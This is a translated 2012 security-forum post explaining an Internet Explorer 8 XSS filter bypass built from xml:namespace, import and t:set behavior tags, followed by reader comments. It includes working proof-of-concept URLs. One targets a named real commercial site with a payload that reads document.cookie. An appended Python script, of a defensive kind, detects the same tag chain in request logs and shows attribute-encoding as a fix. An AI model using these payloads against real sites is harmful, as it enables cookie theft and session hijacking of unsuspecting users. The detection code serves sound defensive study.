IE8 xss filter bypass

gainover | 2012-10-25 11:07

Note: IE 10 has fixed this issue, and IE8 …

————————————————-

1. A <?import …> tag can also be written as an <import …> tag.

<html>
<body>
<div>
  <div id="x">x</div>
  <xml:namespace prefix="t">
  <import namespace="t" implementation="#default#time2">
  <t:set attributeName="innerHTML" targetElement="x" to="&lt;img&#11;src=x:x&#11;onerror&#11;=alert(1)&gt;">
</div>
</body>
</html>

The code above will execute the script fragment in the “to” attribute.

Furthermore, we found that this XSS vector, constructed from the three tags (<xml>, <import> & <t:set …>), can bypass the IE8 XSS filter.

————————————————-

POC1: use <import …>

http://xsst.sinaapp.com/example/1-1.php?page=<div id=x>x</div><xml:namespace prefix=t><import namespace=t implementation=%23default%23time2><t:set/attributename=innerHTML targetElement=x to=%26lt;img%26%2311;src=x:x%26%2311;onerror%26%2311;=alert%26%23x28;1%26%23x29;%26gt;>

Using <?import …> instead will trigger the XSS filter to intercept our code.

2. Our code should start with “> when we encounter a case like <input type="text" value="{parameter under our control}">. The “> will trigger the XSS filter, which will replace some words like ‘namespace’ and ‘attributeName’ in our code. My friend @jackmasa (https://twitter.com/jackmasa) (@xxx on Wooyun.org) gave me a trick to solve the problem: “x> (x represents any letter) does not trigger the filter.

————————————————-

POC2:

http://www.53kf.com/product.php?arg=&search="id=><div/id=x>x</div><xml:namespace prefix=t><import namespace=t implementation=%23default%23time2><t:set/attributename=innerHTML targetElement=x to=%26lt;img%26%2311;src=x:x%26%2311;onerror%26%2311;=alert%26%23x28;document.cookie%26%23x29;%26gt;>

That’s all. Thanks to my friend jackmasa (@xxx on Wooyun.org) for the help.

Author: Gainover

Group:  PKAV .net & Wooyun.org
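As an added, defender-side example (not part of gainover's post, and not code from PKAV or Wooyun.org): the script below flags request parameters that carry the three-tag chain the post describes (xml:namespace, import with an implementation= behavior, and a namespaced :set aimed at a targetElement) after URL-decoding, and shows the server-side fix for the <input value="…"> case, which is attribute-encoding the parameter so the leading "> can never close the attribute. The log format, IPs and sample queries are constructed for the example.

```python
import html
import re
from urllib.parse import unquote, urlsplit

# The three tags the post chains together, matched case-insensitively on decoded values.
# "/" may stand in for whitespace (<t:set/attributename=...), so only tag names are anchored.
VECTOR_MARKERS = [
    re.compile(r"<xml:namespace\b", re.I),
    re.compile(r"<\??import\b[^>]*\bimplementation\s*=", re.I),
    re.compile(r"<\w+:set\b[^>]*\btargetelement\s*=", re.I),
]


def decoded_query_values(url):
    """Split the query on '&' only and URL-decode twice to catch double-encoded values."""
    query = urlsplit(url).query
    return [unquote(unquote(pair.split("=", 1)[-1])) for pair in query.split("&") if pair]


def is_time_behavior_chain(text):
    """True only when all three markers of the chain appear in one decoded value."""
    return all(p.search(text) for p in VECTOR_MARKERS)


def flag_requests(log_lines):
    """Return the log lines (constructed format: '<client-ip> <request-path>') carrying the chain."""
    hits = []
    for line in log_lines:
        _ip, path = line.split(" ", 1)
        if any(is_time_behavior_chain(v) for v in decoded_query_values(path)):
            hits.append(line)
    return hits


def render_input_value(param):
    """Server-side fix: attribute-encode the parameter so '">' cannot close the attribute."""
    return '<input type="text" value="%s">' % html.escape(param, quote=True)


# Constructed sample log: a normal search, the post's tag chain (payload reduced to a <b>),
# and a lone <import> without implementation= that must not be flagged.
SAMPLE_LOG = [
    "10.0.0.1 /product.php?arg=&search=shoes",
    '10.0.0.2 /product.php?arg=&search="id=><div/id=x>x</div><xml:namespace prefix=t>'
    "<import namespace=t implementation=%23default%23time2>"
    "<t:set/attributename=innerHTML targetElement=x to=%26lt;b%26gt;x%26lt;/b%26gt;>",
    "10.0.0.3 /product.php?search=%3Cimport%20namespace%3Dt%3E",
]

if __name__ == "__main__":
    for line in flag_requests(SAMPLE_LOG):
        print("flagged:", line)
    print(render_input_value('">x'))
```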

1#shine | 2012-10-25 11:18

Upvote for Er Ge! Well structured and focused.

 

2#Rookie | 2012-10-25 11:21

Must upvote.. next poster, keep it going

 

3#p.z | 2012-10-25 11:37

Upvoted!

 

4#xsser | 2012-10-25 11:59

Liked it… thanks…

 

5#半世倾尘 | 2012-10-25 12:25

How do you use it?

 

6#/fd (Http://prompt.ml) | 2012-10-25 13:39

Awesome!

 

7#wanglaojiu (If heaven had feelings it too would grow old; if people have feelings they die young, and the bad luck has leaked out again) | 2012-10-25 15:57

Works on mail

 

8#beastk | 2012-10-25 16:03

good job!

 

9#rayh4c | 2012-10-25 18:26

You found this too! Didn't expect that dropping the ? would also work.

 

10#horseluke (微碌) | 2012-10-25 18:47

http://xsst.sinaapp.com/example/1-1.php

“XSS Tutorial – by gainover”, good stuff…….

 

11#gainover | 2012-10-25 19:20

@horseluke = = damn.. don't all of you visit it too much.. it costs cloud beans, okay~

 

12#popok (I'm your granddaddy)(I'm your ancestor) | 2012-10-25 20:56

@gainover big shot, get in touch with Sina and have them verify you as a developer

 

13#horseluke (微碌) | 2012-10-26 10:38

@gainover you can apply for verified developer status

 

14#gainover | 2012-10-26 10:44

@horseluke = = I don't have any app worth verifying.. so I never applied.

 

15#rootkit | 2012-10-26 10:45

@gainover http://xsst.sinaapp.com/example/1-1.php
Please update it

 

16#gainover | 2012-10-26 10:49

@rootkit I'll write more when I have time.. been too lazy to get to it lately..

 

17#/fd (Http://prompt.ml) | 2012-10-26 14:11

@gainover by the way, could you add a charset in the header… it shows garbled text

 

18#xixi | 2012-10-26 14:41

+1.

 

19#kamikaze | 2012-10-26 14:58

This XSS can be exploited even without import

 

20#xsser | 2012-10-26 15:13

@rayh4c impressive, right~

 

21#gainover | 2012-10-26 15:51

@kamikaze style & behavior, you mean?

 

22#kamikaze | 2012-10-26 16:15

@gainover

 

23#px1624 (aaaaaaaaa) | 2012-10-26 20:06

Give it a try..

 

24#Henry:bobo (one fat dude, what are you looking at, tall and fat with two tits like landmines) | 2012-10-29 01:10

Awesome, learned something again, Er Ge is great